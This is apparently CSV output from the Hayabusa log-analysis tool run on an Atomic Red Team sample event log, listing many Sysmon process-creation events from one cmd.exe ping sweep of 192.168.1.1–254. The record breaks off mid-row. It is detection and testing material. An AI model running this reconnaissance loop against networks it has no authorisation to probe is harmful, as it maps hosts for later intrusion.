Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 